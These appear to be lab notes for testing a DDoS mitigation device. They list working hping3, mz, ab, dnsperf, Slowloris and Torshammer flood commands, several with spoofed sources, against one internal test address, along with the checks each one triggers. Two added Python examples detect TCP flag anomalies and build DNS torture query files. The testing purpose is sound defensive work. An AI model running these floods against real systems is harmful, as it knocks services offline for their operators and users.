Example Network Attacks

Following are some example TCP/UDP attacks that can be launched from a Linux system for testing purposes. The note in parentheses after each command records which check or limit the traffic is meant to trigger and the observed result.

TCP SYN and FIN
hping3 10.247.225.134 -a 60.1.1.1 -p 80 -SF -i u1000 (IP anomaly check: SYN and FIN set in the same segment) Done.

TCP ACK and RST Floods (ACK)

hping3 10.247.225.134 -a 60.1.1.2 -s 10005 -p 80 -P -A -k -i u1000 -d 60 (out-of-sequence check: over 30 packets per connection)

sudo hping3 10.247.225.134 -s 10005 -p 80 -P -A -k -i u10 -d 60

TCP ACK and RST Floods (RST)

hping3 10.247.225.134 -s 10009 -p 80 -R -i u10 (SYN authentication: a bad ACK is sent back to the client)
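The TCP tests above rely on the protection device recognising illegal flag combinations such as SYN+FIN. The following is an added example (not part of the original notes) that builds raw IPv4/TCP packets the way hping3 -SF, -A or -R would and runs the flag check over them; the packets, addresses and port numbers are constructed test input, not captured traffic.

```python
"""Flag-anomaly check over raw IPv4/TCP packets (added example, not from the notes)."""
import struct

# TCP flag bits (RFC 793 layout of the 13th byte of the TCP header)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_packet(src, dst, sport, dport, flags, payload=b""):
    """Build a minimal IPv4+TCP packet. Checksums are left at zero: this is
    constructed test input for the parser, not something to put on the wire."""
    total_len = 20 + 20 + len(payload)
    ip_hdr = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, total_len, 0, 0, 64, 6, 0,
        bytes(int(o) for o in src.split(".")),
        bytes(int(o) for o in dst.split(".")),
    )
    # data offset 5 words, no options
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    return ip_hdr + tcp_hdr + payload


def parse_tcp(packet):
    """Return (src, dst, sport, dport, flags) or None if not a complete IPv4/TCP header."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 6 or len(packet) < ihl + 20:
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    sport, dport = struct.unpack("!HH", packet[ihl:ihl + 4])
    flags = packet[ihl + 13]
    return src, dst, sport, dport, flags


def flag_anomaly(flags):
    """Return why a flag byte is invalid, or None if the combination is legal."""
    if flags & SYN and flags & FIN:
        return "SYN+FIN"          # what hping3 -SF produces
    if flags & SYN and flags & RST:
        return "SYN+RST"
    if flags & 0x3F == 0:
        return "null"             # no flags at all
    if flags & (FIN | PSH | URG) == (FIN | PSH | URG):
        return "xmas"
    return None


def scan(packets):
    """Return a list of (src, sport, reason) for every packet that fails the check."""
    hits = []
    for pkt in packets:
        parsed = parse_tcp(pkt)
        if parsed is None:
            continue
        src, _dst, sport, _dport, flags = parsed
        reason = flag_anomaly(flags)
        if reason:
            hits.append((src, sport, reason))
    return hits


if __name__ == "__main__":
    # constructed samples: spoofed SYN+FIN (as in the hping3 -SF test), a plain
    # SYN, a bare ACK (hping3 -A) and a bare RST (hping3 -R)
    sample = [
        build_packet("60.1.1.1", "10.247.225.134", 40000, 80, SYN | FIN),
        build_packet("60.1.1.1", "10.247.225.134", 40001, 80, SYN),
        build_packet("60.1.1.2", "10.247.225.134", 10005, 80, ACK),
        build_packet("60.1.1.3", "10.247.225.134", 10009, 80, RST),
    ]
    for hit in scan(sample):
        print("anomaly:", hit)
```

Only the SYN+FIN packet is reported; a lone ACK or RST is a legal flag combination, which is why the ACK and RST floods above are caught by the out-of-sequence and SYN authentication checks rather than by the flag check.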

UDP Floods (NTP, DNS, SSDP) (DNS)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t dns "sp=10000,dp=53,q=www.aaa.com" -d 10u (DNS auth)
sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp "sp=10000,dp=53,p=aa:aa:aa:aa:aa:aa:aa" -d 10u (Malformed DNS)

UDP Floods (NTP, DNS, SSDP) (SSDP)

sudo mz -c 100000000 -B 10.247.225.134 -A rand -t udp "sp=10000,dp=1900,p=aa:aa:aa:aa:aa:aa:aa" -d 10u (UDP auth)

UDP Floods (NTP, DNS, SSDP) (NTP)

mz -c 100000000 -B 10.247.225.134 -A rand -t udp "sp=10000,dp=123,p=aa:aa:aa:aa:aa:aa:aa" -d 10u (UDP auth)

ICMP Floods

hping3 10.247.225.134 --icmp -C 3 -i u1000 --rand-source (ICMP type 3 -> drop)
done

HTTP GET/POST Flood

ab -n 10000000 -c 10 -r http://10.247.225.134:81/ (HTTP authentication: 302 redirect) - needs investigation

DNS torture (DNS sub-domain)

sudo dnsperf -d dnsfile -s 10.247.225.134 -l 100 -Q 1000 -a 10.10.10.12 -v (DNS label length check: a sub-domain label of 8 or more characters, with a 2-label suffix excluded, is dropped)
done - script issue
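dnsperf reads its queries from a file with one "name type" entry per line. The following is an added example (not part of the original notes) that generates such a file with random sub-domain labels and applies the label-length rule noted beside the dnsperf command, so you can see up front which queries should be dropped and which should pass. The zone name aaa.com, the label lengths and the threshold of 8 characters over a 2-label suffix are assumptions taken from the notes.

```python
"""dnsperf torture-file generator plus the label-length drop rule (added example)."""
import random
import string

ALPHABET = string.ascii_lowercase + string.digits


def random_label(length, rng):
    """One DNS label of the given length; labels are capped at 63 octets by RFC 1035."""
    if not 1 <= length <= 63:
        raise ValueError("label length must be 1..63")
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def torture_names(zone, count, min_len=1, max_len=12, depth=1, seed=0):
    """Build `count` names of `depth` random labels under `zone` (seeded for repeatability)."""
    rng = random.Random(seed)
    names = []
    for _ in range(count):
        labels = [random_label(rng.randint(min_len, max_len), rng) for _ in range(depth)]
        name = ".".join(labels + [zone])
        if len(name) > 253:
            raise ValueError("name exceeds 253 octets")
        names.append(name)
    return names


def dnsperf_lines(names, qtype="A"):
    """dnsperf datafile format: '<name> <qtype>' per line."""
    return [f"{name} {qtype}" for name in names]


def longest_subdomain_label(name, suffix_labels=2):
    """Longest label once the trailing `suffix_labels` labels (the zone) are removed."""
    labels = name.rstrip(".").split(".")
    sub = labels[:-suffix_labels] if len(labels) > suffix_labels else []
    return max((len(label) for label in sub), default=0)


def would_drop(name, suffix_labels=2, max_label=8):
    """Assumed rule from the notes: drop when any sub-domain label is >= max_label chars."""
    return longest_subdomain_label(name, suffix_labels) >= max_label


def split_by_rule(names, suffix_labels=2, max_label=8):
    """Return (dropped, passed) lists for a set of names."""
    dropped = [n for n in names if would_drop(n, suffix_labels, max_label)]
    passed = [n for n in names if not would_drop(n, suffix_labels, max_label)]
    return dropped, passed


def write_dnsfile(path, names, qtype="A"):
    """Write the dnsperf input file and return the number of lines written."""
    lines = dnsperf_lines(names, qtype)
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    names = torture_names("aaa.com", 20)
    dropped, passed = split_by_rule(names)
    print(f"{len(dropped)} expected drops, {len(passed)} expected passes")
    write_dnsfile("dnsfile", names)
```

Run it before the dnsperf command, then compare the dropped/passed counts with what the device reports; a mismatch points at either the rule as configured or at the script issue noted above.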

DNS/NTP amplification (DNS)

sudo hping3 10.247.225.134 -a 60.1.1.10 --udp -d 1470 -p 2000 -s 53 --keep -i u10 (UDP maximum size = 1400)

DNS/NTP amplification (NTP)

hping3 10.247.225.134 -a 60.1.1.11 --udp -d 1470 -p 2000 -s 123 --keep -i u1000 (UDP maximum size = 1400)

SIP Floods (Malformed SIP)

sudo mz -c 100000000 -B 10.247.225.134 -A 40.1.1.2 -t udp "sp=10000,dp=5061,p=aa:aa:aa:aa:aa:aa:aa" -d 1000u (Malformed SIP; note that 5061 is the SIP-over-TLS port, plain SIP over UDP listens on 5060)

Slowloris
./slowloris.pl -dns 10.247.225.134 -timeout 10 -num 2000 (HTTP header timeout = 5 seconds -> reset)

Slow Post
sudo ./torshammer.py -t 10.247.225.134 -r 100 (POST packet size <= 150 bytes, number of packets >= 10)

Sockstress
sudo ab -n 100000 -c 500 -r http://10.247.225.134/ (concurrent connection limit per source > 500 -> drop). Note that this is not the Sockstress tool itself; ab is used here only to open 500 concurrent connections from one source to exercise the per-source connection limit.